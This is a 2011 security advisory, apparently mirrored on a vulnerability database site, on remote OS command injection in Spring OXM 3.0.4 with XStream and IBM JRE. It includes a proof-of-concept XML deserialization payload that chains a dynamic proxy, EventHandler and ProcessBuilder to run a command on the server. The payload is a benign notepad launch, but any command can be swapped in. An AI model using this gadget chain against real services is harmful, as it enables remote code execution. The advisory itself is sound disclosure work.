Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26618
HistoryJul 06, 2011 - 12:00 a.m.

Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used

2011-07-0600:00:00
vulners.com
163
JSON

Reference:
http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics

CVSS: 7.6
AccessVector: Network
AccessComplexity: High
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete

Details:

Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.

This is an example of legitimate input:

<bicycle>
<name>unicycle</name>
<id>123</id>
<nbrWheels>1</nbrWheels>
<nbrRiders>1</nbrRiders>
</bicycle>

This malicious input will execute the notepad application on the server and open the
C:\Windows\win.ini file

<bicycle class="java.util.TreeSet">
<no-comparator />
<object />
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>notepad.exe</string>
<string>c:\windows\win.ini</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</bicycle>

JSON